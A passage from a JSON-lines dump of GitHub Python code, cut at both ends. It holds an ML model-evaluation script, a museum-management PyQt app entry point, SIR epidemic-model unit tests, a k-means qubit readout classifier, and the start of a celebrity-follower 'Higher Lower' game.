pd.concat(dfs2, join=\"inner\", axis=1, sort=True)\ndf2_merge = df2_merge_tmp.loc[df2_merge_tmp[\"MONO\"]==1,:]\ndf2_test = df2_merge[lst_feat].dropna()\nlst_test = list(df2_test.index)\ntest_y = df2_merge.loc[lst_test, type_]\n#df2_test_tmp = pd.merge(df2_test, test_y, how=\"inner\", left_index=True, right_index=True)\n#df_total = pd.concat([df_merge_sub, df2_test_tmp])\n\narray_test = sc_final.transform(df2_test)\ndf2_test_sc = pd.DataFrame(array_test, index=df2_test.index, columns=df2_test.columns)\n\n#### prediction\n\n## DNN\ninp_X = T.Tensor(df2_test_sc.to_numpy())\nmodel = model.eval()\npred_y = model(inp_X)\nap_dnn = average_precision_score(test_y.to_numpy(), pred_y.detach().numpy())\nroc_dnn 
= roc_auc_score(test_y.to_numpy(), pred_y.detach().numpy())\n\n## XGB\nxgb_from_joblib = joblib.load('best_estimator3_xgb.pkl')\npred_y_xgb = xgb_from_joblib.predict(df2_test)\nap_xgb = average_precision_score(test_y, pred_y_xgb)\nroc_xgb = roc_auc_score(test_y, pred_y_xgb)\n\n## SVM\nsvm_from_joblib = joblib.load('best_estimator3_svm.pkl')\npred_y_svm = svm_from_joblib.predict(df2_test_sc)\nap_svm = average_precision_score(test_y, pred_y_svm)\nroc_svm = roc_auc_score(test_y, pred_y_svm)\n\n## RF\nrf_from_joblib = joblib.load('best_estimator3_rf.pkl')\npred_y_rf = rf_from_joblib.predict(df2_test)\nap_rf = average_precision_score(test_y, pred_y_rf)\nroc_rf = roc_auc_score(test_y, pred_y_rf)\n\n# save the result\nf_res_test = open(\"results_test_NC.tsv\",\"w\")\nf_res_test.write(\"ap_xgb : %f\\nap_svm : %f\\nap_rf : %f\\nap_dnn : %f\\n\"%(ap_xgb, ap_svm, ap_rf, ap_dnn))\nf_res_test.write(\"roc_xgb : %f\\nroc_svm : %f\\nroc_rf : %f\\nroc_dnn : %f\\n\"%(roc_xgb, roc_svm, roc_rf, roc_dnn))\nf_res_test.close()\n","repo_name":"kaistomics/GERMirAE","sub_path":"GERMirAE.py","file_name":"GERMirAE.py","file_ext":"py","file_size_in_byte":21181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23213359076","text":"import ctypes\nimport datetime\nimport os\nimport random\nimport string\nimport sys\nimport time\nfrom threading import Thread\n\nimport schedule\nimport win32gui\nimport winotify\nfrom PyQt5.QtWidgets import QApplication\n\nfrom backend.high_level.clientela.enum.tariffa import Tariffa\nfrom backend.high_level.clientela.enum.tipo_abbonamento import TipoAbbonamento\nfrom backend.high_level.gestione_interna.opera import Opera\nfrom frontend.controller.amministrazione.controller_gestione_dipendenti import ControllerGestioneDipendenti\nfrom frontend.controller.amministrazione.controller_home_amministrazione import ControllerHomeAmministrazione\nfrom frontend.controller.controller_home import ControllerHome\nfrom frontend.controller.reception.controller_acquisto_biglietto import ControllerAcquistoBiglietto\nfrom frontend.controller.reception.controller_home_reception import ControllerHomeReception\nfrom frontend.controller.reception.controller_ricerca_opera import ControllerRicercaOpera\nfrom frontend.controller.segreteria.controller_home_segreteria import ControllerHomeSegreteria\nfrom frontend.ui.location import UI_DIR\nfrom frontend.view.amministrazione.vista_gestione_dipendenti import VistaGestioneDipendenti\nfrom frontend.view.amministrazione.vista_home_amministrazione import VistaHomeAmministrazione\nfrom frontend.view.reception.vista_acquisto_biglietto import VistaAcquistoBiglietto\nfrom frontend.view.reception.vista_home_reception import VistaHomeReception\nfrom frontend.view.reception.vista_ricerca_opera import VistaRicercaOpera\nfrom frontend.view.segreteria.vista_home_segreteria import VistaHomeSegreteria\nfrom frontend.view.vista_home import VistaHome\n\n\n# for name, value in locals().items():\n# setattr(self,name, value)\ndef popolaMuseo():\n from backend.high_level.museo import Museo\n from backend.high_level.clientela.biglietto import Biglietto\n from backend.high_level.clientela.enum.sesso import Sesso\n from backend.high_level.clientela.visitatore import Visitatore\n from backend.high_level.clientela.cliente import Cliente\n from backend.high_level.clientela.abbonamento import Abbonamento\n from backend.high_level.gestione_interna.enum.reparto_museo import RepartoMuseo\n from 
backend.high_level.gestione_interna.enum.periodo_storico import PeriodoStorico\n\n museo = Museo.getInstance()\n\n # create the tickets for the visitors and the clients\n biglietti = [Biglietto() for _ in range(500)]\n for biglietto in biglietti:\n biglietto.date_convalida.append(\n datetime.datetime.strptime(str(random.randrange(1, 28)) + '/10/2022', '%d/%m/%Y'))\n # add the visitors\n visitatori = []\n for i in range(random.randrange(50, 150)):\n visitatori.append(\n Visitatore(\n provenienza=random.choices(['ITA', 'FRA', 'GER', 'ING', 'AMERICA'], [4, 1, 1, 1, 2])[0],\n dataNascita=datetime.datetime.strptime('10/02/' + str(random.randrange(1920, 2020)), '%d/%m/%Y'),\n sesso=random.choices([Sesso.MASCHIO, Sesso.FEMMINA, Sesso.NON_SPECIFICATO], [3, 3, 1])[0],\n biglietti=[biglietti[i]],\n )\n )\n # add the tickets to the visitors\n for visitatore in visitatori:\n visitatore.biglietti.extend(\n [Biglietto(\n reparto=random.choice([e for e in RepartoMuseo]),\n tariffa=random.choice([e for e in Tariffa]),\n dataRilascio=datetime.datetime.strptime(\n str(random.randrange(1, 28)) + '/' + str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y'),\n turno=random.choice([None, *museo.turni_guida]),\n ) for _ in range(random.randrange(1, 50))]\n )\n\n museo.visitatori.extend(visitatori)\n\n # add the clients\n clienti = []\n for i in range(random.randrange(30, 80)):\n # add the subscriptions to the clients\n abbonamenti = [\n Abbonamento(\n dataRilascio=datetime.datetime.strptime('15/' + str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y'),\n tipo=random.choice([e for e in TipoAbbonamento])\n ) for _ in range(random.randrange(1, 3))]\n for abbonamento in abbonamenti:\n abbonamento.date_convalida.extend(\n [datetime.datetime.strptime(str(random.randrange(1, 28)) + '/' +\n str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y') for _ in\n range(random.randrange(5, 50))]\n )\n rinnovi = {\n datetime.datetime.strptime('10/' + str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y'):\n random.choice([e for e in TipoAbbonamento]) for _ in range(random.randrange(1, 10))\n }\n abbonamento.date_rinnovo = {**abbonamento.date_rinnovo, **rinnovi}\n\n clienti.append(\n Cliente(\n nome='pippo',\n cognome='baudo',\n codFis='AAA',\n prov=random.choices(['ITA', 'FRA', 'GER', 'ING', 'AMERICA'], [4, 1, 1, 1, 2])[0],\n nasc=datetime.datetime.strptime('10/02/' + str(random.randrange(1920, 2020)), '%d/%m/%Y'),\n sesso=random.choices([e for e in Sesso], [3, 3, 1, 0])[0],\n biglietti=[biglietti[i + 150]],\n abbonamenti=abbonamenti,\n )\n )\n museo.visitatori.extend(clienti)\n\n # add the artworks\n opere = []\n for i in range(50):\n opera = Opera(\n autore=random.choice(['Picasso', 'Botticelli', 'DaVinci', 'Raffaello', 'Michelangelo', 'Dalì', 'Klimt']),\n titolo=''.join(random.choice(string.ascii_lowercase) for _ in range(5)),\n descrizione='',\n immagine=None,\n costo=random.randrange(100, 5000),\n reparto=random.choice([e for e in RepartoMuseo]),\n periodo=random.choice([e for e in PeriodoStorico]),\n )\n rand_data = datetime.datetime.strptime('20/' + str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y')\n rand = random.randrange(0, 3)\n if rand == 1:\n opera.data_vendita = rand_data\n elif rand == 2:\n opera.data_acquisto = rand_data\n opere.append(opera)\n\n museo.opere.extend(opere)\n museo.make_backup()\n\n\ndef startApp():\n # fix for the taskbar icon not being visible\n myappid = 'museum.1.0'\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n\n app = QApplication(sys.argv)\n\n # MVC\n vista_home = VistaHome()\n # 
controller_home = ControllerHome(vista_home)\n # from backend.high_level.personale.dipendente import Dipendente\n # controller_home = ControllerHomeReception(VistaHomeReception(), ControllerHome(vista_home),None)\n # Dipendente('a', 'b', datetime.datetime.now()))\n controller_home = ControllerHome(vista_home)\n sys.exit(app.exec())\n\n\ndef font_presenti():\n def callback(font, tm, fonttype, names):\n names.append(font.lfFaceName)\n return True\n font_names = []\n hdc = win32gui.GetDC(None)\n win32gui.EnumFontFamilies(hdc, None, callback, font_names)\n win32gui.ReleaseDC(hdc, None)\n\n if 'Lato' not in font_names or 'Lato Light' not in font_names:\n notifica = winotify.Notification(\n app_id='Museo Omero',\n title='Font necessari [Lato]',\n msg='Per favore, installa i seguenti fonts e poi riavvia il software',\n icon=UI_DIR + '/ico/museum_white.ico',\n duration='short',\n )\n notifica.set_audio(winotify.audio.Default, False)\n notifica.show()\n\n time.sleep(3)\n os.startfile(UI_DIR+'/fonts/Lato-Regular.ttf')\n os.startfile(UI_DIR+'/fonts/Lato-Light.ttf')\n os.startfile(UI_DIR+'/fonts/Lato-LightItalic.ttf')\n os._exit(1)\n\n\ndef scheduler():\n def action():\n from backend.high_level.museo import Museo\n from backend.high_level.clientela.cliente import Cliente\n\n museo = Museo.getInstance()\n # back up the museum\n museo.make_backup()\n # e-mail subscription expiry reminders\n for cliente in museo.visitatori:\n if isinstance(cliente, Cliente):\n for abbonamento in cliente.abbonamenti:\n if abbonamento.giorniAllaScadenza() == 5:\n cliente.notification.send(title=\"Museo Omero: scadenza prossima.\",\n content=\"Si comunica che il Suo abbonamento scadrà tra 5 giorni.\"\n \" Si prega di rinnovarlo.\\n Cordiali saluti.\\nLo staff.\")\n schedule.every().day.at(\"23:59\").do(action)\n while True:\n schedule.run_pending()\n time.sleep(10)\n\n\nif __name__ == '__main__':\n #popolaMuseo()\n thread = Thread(target=scheduler)\n # thread.start()\n font_presenti()\n startApp()","repo_name":"MrPio/MuseoOmero-Python","sub_path":"frontend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8859,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74909812647","text":"from datetime import date\n\nimport pytest\nimport pandas as pd\nimport numpy as np\nfrom datetime import timedelta\n\nfrom penn_chime.constants import EPSILON\nfrom penn_chime.model.sir import (\n    sir,\n    sim_sir,\n    get_growth_rate,\n    Sir,\n)\n\n\ndef test_sir():\n    \"\"\"\n    Someone who is good at testing, help\n    \"\"\"\n    sir_test = sir(100, 1, 0, 0.2, 0.5, 1)\n    assert sir_test == (\n        0.7920792079207921,\n        0.20297029702970298,\n        0.0049504950495049506,\n    ), \"This contrived example should work\"\n\n    assert isinstance(sir_test, tuple)\n    for v in sir_test:\n        assert isinstance(v, float)\n        assert v >= 0\n\n    # Certain things should *not* work\n    with pytest.raises(TypeError) as error:\n        sir(\"S\", 1, 0, 0.2, 0.5, 1)\n    assert str(error.value) == \"can't multiply sequence by non-int of type 'float'\"\n\n    with pytest.raises(TypeError) as error:\n        sir(100, \"I\", 0, 0.2, 0.5, 1)\n    assert str(error.value) == \"can't multiply sequence by non-int of type 'float'\"\n\n    with pytest.raises(TypeError) as error:\n        sir(100, 1, \"R\", 0.2, 0.5, 1)\n    assert str(error.value) == \"unsupported operand type(s) for +: 'float' and 'str'\"\n\n    with pytest.raises(TypeError) as error:\n        sir(100, 1, 0, \"beta\", 0.5, 1)\n    assert str(error.value) == \"bad operand type for unary -: 'str'\"\n\n    with pytest.raises(TypeError) as 
error:\n sir(100, 1, 0, 0.2, \"gamma\", 1)\n assert str(error.value) == \"unsupported operand type(s) for -: 'float' and 'str'\"\n\n with pytest.raises(TypeError) as error:\n sir(100, 1, 0, 0.2, 0.5, \"N\")\n assert str(error.value) == \"unsupported operand type(s) for /: 'str' and 'float'\"\n\n # Zeros across the board should fail\n with pytest.raises(ZeroDivisionError):\n sir(0, 0, 0, 0, 0, 0)\n\n\ndef test_sim_sir():\n \"\"\"\n Rounding to move fast past decimal place issues\n \"\"\"\n raw = sim_sir(\n 5, 6, 7, 0.1, 0, [(0.1, 40)], # s # i # r # gamma # i_day # beta1 # n_days1\n )\n\n assert round(raw[\"susceptible\"][0], 0) == 5\n assert round(raw[\"infected\"][0], 2) == 6\n assert round(raw[\"recovered\"][0], 0) == 7\n assert round(raw[\"susceptible\"][-1], 2) == 0\n assert round(raw[\"infected\"][-1], 2) == 0.18\n assert round(raw[\"recovered\"][-1], 2) == 17.82\n\n\ndef test_growth_rate():\n assert np.round(get_growth_rate(5) * 100.0, decimals=4) == 14.8698\n assert np.round(get_growth_rate(0) * 100.0, decimals=4) == 0.0\n assert np.round(get_growth_rate(-4) * 100.0, decimals=4) == -15.9104\n\n\ndef test_model(model, param):\n # test the Model\n\n assert round(model.infected, 0) == 45810.0\n assert isinstance(model.infected, float) # based off note in models.py\n\n # test the class-calculated attributes\n # we're talking about getting rid of detection probability\n # assert model.detection_probability == 0.125\n assert model.intrinsic_growth_rate == 0.12246204830937302\n assert abs(model.beta - 4.21501347256401e-07) < EPSILON\n assert model.r_t == 2.307298374881539\n assert model.r_naught == 2.7144686763312222\n assert model.doubling_time_t == 7.764405988534983\n assert model.i_day == 43\n\n\ndef test_model_first_hosp_fit(param):\n param.date_first_hospitalized = param.current_date - timedelta(days=43)\n param.doubling_time = None\n\n my_model = Sir(param)\n\n assert abs(my_model.intrinsic_growth_rate - 0.123) / 0.123 < 0.01\n assert abs(my_model.beta - 4.21501347256401e-07) < EPSILON\n assert abs(my_model.r_t - 2.32) / 2.32 < 0.01\n assert abs(my_model.r_naught - 2.72) / 2.72 < 0.01\n assert abs(my_model.doubling_time_t - 7.71)/7.71 < 0.01\n\n\ndef test_model_raw_start(model, param):\n raw_df = model.raw_df\n\n # test the things n_days creates, which in turn tests sim_sir, sir, and get_dispositions\n\n # print('n_days: %s; i_day: %s' % (param.n_days, model.i_day))\n assert len(raw_df) == (len(np.arange(-model.i_day, param.n_days + 1))) == 104\n\n first = raw_df.iloc[0, :]\n second = raw_df.iloc[1, :]\n\n assert first.susceptible == 499600.0\n assert round(second.infected, 0) == 449.0\n assert list(model.dispositions_df.loc[0, [\n \"day\",\n \"date\",\n \"ever_hospitalized\",\n \"ever_icu\",\n \"ever_ventilated\",\n ]]) == [\n -43,\n date(year=2020, month=2, day=14),\n 1.0,\n 0.4,\n 0.2,\n ]\n assert round(raw_df.recovered[30], 0) == 7083.0\n\n d, dt, hosp, icu, vent = list(model.dispositions_df.loc[60, [\n \"day\",\n \"date\",\n \"ever_hospitalized\",\n \"ever_icu\",\n \"ever_ventilated\",\n ]])\n assert dt == date(year=2020, month=4, day=14)\n assert [round(v, 0) for v in (d, hosp, icu, vent)] == [17, 549.0, 220.0, 110.0]\n\n\ndef test_model_conservation(param, model):\n raw_df = model.raw_df\n\n assert (0.0 <= raw_df.susceptible).all()\n assert (0.0 <= raw_df.infected).all()\n assert (0.0 <= raw_df.recovered).all()\n\n diff = raw_df.susceptible + raw_df.infected + raw_df.recovered - param.population\n assert (diff < 0.1).all()\n\n assert (raw_df.susceptible <= 
param.population).all()\n    assert (raw_df.infected <= param.population).all()\n    assert (raw_df.recovered <= param.population).all()\n\n\ndef test_model_raw_end(param, model):\n    raw_df = model.raw_df\n    last = raw_df.iloc[-1, :]\n    assert round(last.susceptible, 0) == 83391.0\n\n\ndef test_model_monotonicity(param, model):\n    raw_df = model.raw_df\n\n    # Susceptible population should be non-increasing, and Recovered non-decreasing\n    assert (raw_df.susceptible[1:] - raw_df.susceptible.shift(1)[1:] <= 0).all()\n    assert (raw_df.recovered[1:] - raw_df.recovered.shift(1)[1:] >= 0).all()\n\n\ndef test_model_cumulative_census(param, model):\n    # test that census is being properly calculated\n    raw_df = model.raw_df\n    admits_df = model.admits_df\n    df = pd.DataFrame(\n        {\n            \"hospitalized\": admits_df.admits_hospitalized,\n            \"icu\": admits_df.admits_icu,\n            \"ventilated\": admits_df.admits_ventilated,\n        }\n    )\n    admits = df.cumsum()\n\n    # 1.0 is for the one hospital patient on the first day, who won't appear in the admissions\n    diff = admits.hospitalized[1:-1] - (\n        param.market_share * param.hospitalized.rate * (raw_df.infected[1:-1] + raw_df.recovered[1:-1]) - 1.0\n    )\n    assert (diff.abs() < 0.1).all()\n","repo_name":"CodeForPhilly/chime","sub_path":"tests/penn_chime/model/test_sir.py","file_name":"test_sir.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"53"} +{"seq_id":"27116489830","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import array, reshape, mean, transpose, ndarray\nfrom sklearn.cluster import KMeans\n\n\n\ndef get_KmeansSklearn( n_clusters, iqComplex )->KMeans:\n    data = complex_to_vector(iqComplex, vectorShape=\"H\")\n    kmeans = KMeans(n_clusters=n_clusters,tol=1e-4).fit(data)\n    return kmeans\n\ndef get_population( iqCenter:ndarray, iqComplex:ndarray ):\n    #print(iqCenter, iqComplex)\n    myKmean = get_KmeansSklearn(2,iqCenter)\n    iqVectData = complex_to_vector(iqComplex,vectorShape=\"H\")\n    clusterData = myKmean.predict(iqVectData.reshape((iqComplex.size,2)))\n\n    return mean(clusterData.reshape(iqComplex.shape),axis=iqComplex.ndim-1)\n\ndef complex_to_vector( complexArray:ndarray, vectorShape=\"V\" ):\n    transArr = array([complexArray.real,complexArray.imag])\n    if vectorShape == \"V\":\n        return transArr\n    elif vectorShape == \"H\":\n        if complexArray.ndim == 2:\n            return transArr.transpose((1,2,0))\n        if complexArray.ndim == 1:\n            return transArr.transpose((1,0))\n\ndef vector_to_complex( vectorArray ):\n    newVectorArray = vectorArray.transpose()\n    print(newVectorArray)\n    complexArray = newVectorArray[0]+1j*newVectorArray[1]\n    return complexArray\n\ndef get_projectedIQVector_byTwoPt( projComplex, iqComplex ):\n    refPoint = mean(projComplex)\n    shiftedIQComplex = iqComplex-refPoint\n    relativeProjComplex = projComplex[0]-refPoint\n    projectionVector = complex_to_vector(array([relativeProjComplex]),\"H\")\n    shiftedIQVector = complex_to_vector(shiftedIQComplex,\"V\")\n    projectionMatrix = projectionVector.transpose()@projectionVector/abs(relativeProjComplex)**2\n    projectedVector = projectionMatrix@shiftedIQVector\n    return projectedVector\n\ndef get_projectedIQDistance_byTwoPt( projComplex, iqComplex ):\n    refPoint = mean(projComplex)\n    shiftedIQComplex = iqComplex-refPoint\n    relativeProjComplex = projComplex[0]-refPoint\n    projectionVector = complex_to_vector(array([relativeProjComplex]),\"H\")\n    shiftedIQVector = complex_to_vector(shiftedIQComplex,\"V\")\n    projectedDistance = projectionVector@shiftedIQVector/abs(relativeProjComplex)\n    
return projectedDistance[0]\n\ndef get_simulationData(measurementPts, excitedProbability, iqPosition, sigma):\n excPts = int(measurementPts*excitedProbability)\n groundProbability = 1-excitedProbability\n groundPts = int(measurementPts*groundProbability)\n gpos=iqPosition[0]\n epos=iqPosition[1]\n g = np.random.normal(gpos.real, sigma, groundPts)+1j*np.random.normal(gpos.imag, sigma, groundPts)\n e = np.random.normal(epos.real, sigma, excPts)+1j*np.random.normal(epos.imag, sigma, excPts)\n\n iqdata = np.append(g,e) \n return iqdata\n\ndef get_oneShot_kmeanDistance(iqdata):\n\n km = get_KmeansSklearn(2,iqdata)\n clusterCenter = km.cluster_centers_.transpose()\n clusterCenter = clusterCenter[0]+1j*clusterCenter[1]\n projectedDistance = get_projectedIQDistance_byTwoPt(clusterCenter,iqdata)\n #b = get_projectedIQVector_byTwoPt(clusterCenter,iqdata)\n return projectedDistance\n\ndef get_oneshot_plot(iqdata,simIQCenter=None):\n km = get_KmeansSklearn(2,iqdata)\n clusterCenter = vector_to_complex(km.cluster_centers_)\n a = get_projectedIQDistance_byTwoPt(clusterCenter,iqdata)\n plt.figure(1)\n plt.plot( iqdata.real, iqdata.imag, \"o\", label=\"Data\" )\n plt.plot( clusterCenter.real, clusterCenter.imag, \"o\", label=\"KMeans\" )\n #if simIQCenter != None:\n simCenter = array(simIQCenter).transpose()\n plt.plot( simCenter.real, simCenter.imag,\"ro\", label=\"Simulation\" )\n plt.figure(2)\n count, bins, ignored = plt.hist(a, 60, density=True)\n plt.show()\ndef population_test(simCenter,measurementPts,ProbabilityRange,statisticTest=20):\n statisticTest = int(statisticTest)\n errorDistanceMean = np.empty(ProbabilityRange.shape[-1])\n errorDistanceSTD = np.empty(ProbabilityRange.shape[-1])\n for i,excitedProbability in enumerate(ProbabilityRange):\n\n ed = np.empty(statisticTest)\n for j in range(statisticTest):\n km = get_KmeansSklearn(2,get_simulationData(measurementPts,excitedProbability,simCenter,sigma))\n clusterCenter = km.cluster_centers_.transpose()\n clusterCenter = clusterCenter[0]+1j*clusterCenter[1]\n errorDistanceP1 = mean(abs(simCenter.transpose()-clusterCenter))\n\n clusterCenterP2 = array([clusterCenter[1],clusterCenter[0]])\n errorDistanceP2 = mean(abs(simCenter.transpose()-clusterCenterP2))\n\n ed[j] = np.min([errorDistanceP1,errorDistanceP2])\n errorDistanceMean[i] = np.mean(ed)\n errorDistanceSTD[i] = np.std(ed)\n plt.figure(1)\n plt.errorbar( ProbabilityRange, errorDistanceMean, yerr=errorDistanceSTD, fmt=\"ro\" )\n plt.show()\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n import numpy as np\n\n\n simQICenter = array([1+1j,1+2j])\n #print(simQICenter)\n measurementPts = 1000\n sigma = 0.2\n #get_oneshot_plot(get_simulationData(measurementPts,0.5,simQICenter,sigma),simIQCenter=simQICenter)\n statisticTest = int(20)\n ProbabilityRange = np.linspace(0.1,0.9,9)\n # testComplex = array([[0+1j,1+1j],[2+2j,3+3j],[4+4j,5+5j]])\n # print(testComplex)\n # print(complex_to_vector(testComplex))\n # print(complex_to_vector(testComplex, vectorShape=\"H\"))\n\n\n # testComplex = array([0+1j,2+3j])\n # print(testComplex)\n # print(complex_to_vector(testComplex))\n # print(complex_to_vector(testComplex, vectorShape=\"H\"))\n # testComplex = array([[1,2],[3,4]])\n # print(vector_to_complex(testComplex))\n data = array([get_simulationData(measurementPts,0.5,simQICenter,sigma),get_simulationData(measurementPts,0.25,simQICenter,sigma)])\n #data = get_simulationData(measurementPts,0.7,simQICenter,sigma)\n\n #print(data)\n print(get_population(simQICenter,data))\n 
#population_test(simCenter,measurementPts,ProbabilityRange,statisticTest=20)\n \n ","repo_name":"asqum/PYQUM","sub_path":"TEST/BETAsite/state_distinguishability/state_distinguishability/iq_kmean.py","file_name":"iq_kmean.py","file_ext":"py","file_size_in_byte":5922,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"72849590568","text":"data = [\n {\n 'name': 'Instagram',\n 'follower_count': 346,\n 'description': 'Social media platform',\n 'country': 'United States'\n },\n {\n 'name': 'Cristiano Ronaldo',\n 'follower_count': 215,\n 'description': 'Footballer',\n 'country': 'Portugal'\n },\n {\n 'name': 'Ariana Grande',\n 'follower_count': 183,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': 'Dwayne Johnson',\n 'follower_count': 181,\n 'description': 'Actor and professional wrestler',\n 'country': 'United States'\n },\n {\n 'name': 'Selena Gomez',\n 'follower_count': 174,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': 'Kylie Jenner',\n 'follower_count': 172,\n 'description': 'Reality TV personality and businesswoman and Self-Made Billionaire',\n 'country': 'United States'\n },\n {\n 'name': 'Kim Kardashian',\n 'follower_count': 167,\n 'description': 'Reality TV personality and businesswoman',\n 'country': 'United States'\n },\n {\n 'name': 'Lionel Messi',\n 'follower_count': 149,\n 'description': 'Footballer',\n 'country': 'Argentina'\n },\n {\n 'name': 'Beyoncé',\n 'follower_count': 145,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'Neymar',\n 'follower_count': 138,\n 'description': 'Footballer',\n 'country': 'Brasil'\n },\n {\n 'name': 'National Geographic',\n 'follower_count': 135,\n 'description': 'Magazine',\n 'country': 'United States'\n },\n {\n 'name': 'Justin Bieber',\n 'follower_count': 133,\n 'description': 'Musician',\n 'country': 'Canada'\n },\n {\n 'name': 'Taylor Swift',\n 'follower_count': 131,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'Kendall Jenner',\n 'follower_count': 127,\n 'description': 'Reality TV personality and Model',\n 'country': 'United States'\n },\n {\n 'name': 'Jennifer Lopez',\n 'follower_count': 119,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': 'Nicki Minaj',\n 'follower_count': 113,\n 'description': 'Musician',\n 'country': 'Trinidad and Tobago'\n },\n {\n 'name': 'Nike',\n 'follower_count': 109,\n 'description': 'Sportswear multinational',\n 'country': 'United States'\n },\n {\n 'name': 'Khloé Kardashian',\n 'follower_count': 108,\n 'description': 'Reality TV personality and businesswoman',\n 'country': 'United States'\n },\n {\n 'name': 'Miley Cyrus',\n 'follower_count': 107,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': 'Katy Perry',\n 'follower_count': 94,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'Kourtney Kardashian',\n 'follower_count': 90,\n 'description': 'Reality TV personality',\n 'country': 'United States'\n },\n {\n 'name': 'Kevin Hart',\n 'follower_count': 89,\n 'description': 'Comedian and actor',\n 'country': 'United States'\n },\n {\n 'name': 'Ellen DeGeneres',\n 'follower_count': 87,\n 'description': 'Comedian',\n 'country': 'United States'\n },\n {\n 'name': 'Real Madrid CF',\n 'follower_count': 86,\n 'description': 'Football club',\n 'country': 'Spain'\n },\n {\n 'name': 'FC Barcelona',\n 'follower_count': 
85,\n 'description': 'Football club',\n 'country': 'Spain'\n },\n {\n 'name': 'Rihanna',\n 'follower_count': 81,\n 'description': 'Musician and businesswoman',\n 'country': 'Barbados'\n },\n {\n 'name': 'Demi Lovato',\n 'follower_count': 80,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': \"Victoria's Secret\",\n 'follower_count': 69,\n 'description': 'Lingerie brand',\n 'country': 'United States'\n },\n {\n 'name': 'Zendaya',\n 'follower_count': 68,\n 'description': 'Actress and musician',\n 'country': 'United States'\n },\n {\n 'name': 'Shakira',\n 'follower_count': 66,\n 'description': 'Musician',\n 'country': 'Colombia'\n },\n {\n 'name': 'Drake',\n 'follower_count': 65,\n 'description': 'Musician',\n 'country': 'Canada'\n },\n {\n 'name': 'Chris Brown',\n 'follower_count': 64,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'LeBron James',\n 'follower_count': 63,\n 'description': 'Basketball player',\n 'country': 'United States'\n },\n {\n 'name': 'Vin Diesel',\n 'follower_count': 62,\n 'description': 'Actor',\n 'country': 'United States'\n },\n {\n 'name': 'Cardi B',\n 'follower_count': 67,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'David Beckham',\n 'follower_count': 82,\n 'description': 'Footballer',\n 'country': 'United Kingdom'\n },\n {\n 'name': 'Billie Eilish',\n 'follower_count': 61,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'Justin Timberlake',\n 'follower_count': 59,\n 'description': 'Musician and actor',\n 'country': 'United States'\n },\n {\n 'name': 'UEFA Champions League',\n 'follower_count': 58,\n 'description': 'Club football competition',\n 'country': 'Europe'\n },\n {\n 'name': 'NASA',\n 'follower_count': 56,\n 'description': 'Space agency',\n 'country': 'United States'\n },\n {\n 'name': 'Emma Watson',\n 'follower_count': 56,\n 'description': 'Actress',\n 'country': 'United Kingdom'\n },\n {\n 'name': 'Shawn Mendes',\n 'follower_count': 57,\n 'description': 'Musician',\n 'country': 'Canada'\n },\n {\n 'name': 'Virat Kohli',\n 'follower_count': 55,\n 'description': 'Cricketer',\n 'country': 'India'\n },\n {\n 'name': 'Gigi Hadid',\n 'follower_count': 54,\n 'description': 'Model',\n 'country': 'United States'\n },\n {\n 'name': 'Priyanka Chopra Jonas',\n 'follower_count': 53,\n 'description': 'Actress and musician',\n 'country': 'India'\n },\n {\n 'name': '9GAG',\n 'follower_count': 52,\n 'description': 'Social media platform',\n 'country': 'China'\n },\n {\n 'name': 'Ronaldinho',\n 'follower_count': 51,\n 'description': 'Footballer',\n 'country': 'Brasil'\n },\n {\n 'name': 'Maluma',\n 'follower_count': 50,\n 'description': 'Musician',\n 'country': 'Colombia'\n },\n {\n 'name': 'Camila Cabello',\n 'follower_count': 49,\n 'description': 'Musician',\n 'country': 'Cuba'\n },\n {\n 'name': 'NBA',\n 'follower_count': 47,\n 'description': 'Club Basketball Competition',\n 'country': 'United States'\n }\n]\n\nlogo = \"\"\"\n __ ___ __ \n / / / (_)___ _/ /_ ___ _____\n / /_/ / / __ `/ __ \\/ _ \\/ ___/\n / __ / / /_/ / / / / __/ / \n/_/ ///_/\\__, /_/ /_/\\___/_/ \n / / /____/_ _____ _____\n / / / __ \\ | /| / / _ \\/ ___/\n / /___/ /_/ / |/ |/ / __/ / \n/_____/\\____/|__/|__/\\___/_/ \n\"\"\"\n\nvs = \"\"\"\n _ __ \n| | / /____\n| | / / ___/\n| |/ (__ ) \n|___/____(_)\n\"\"\"\n\n# import random\nimport random\nprint(logo)\n# game start/end variable\nend_of_game = False\n# intialize item1 and item 2\nitem1 = random.choice(data)\nitem2 = 
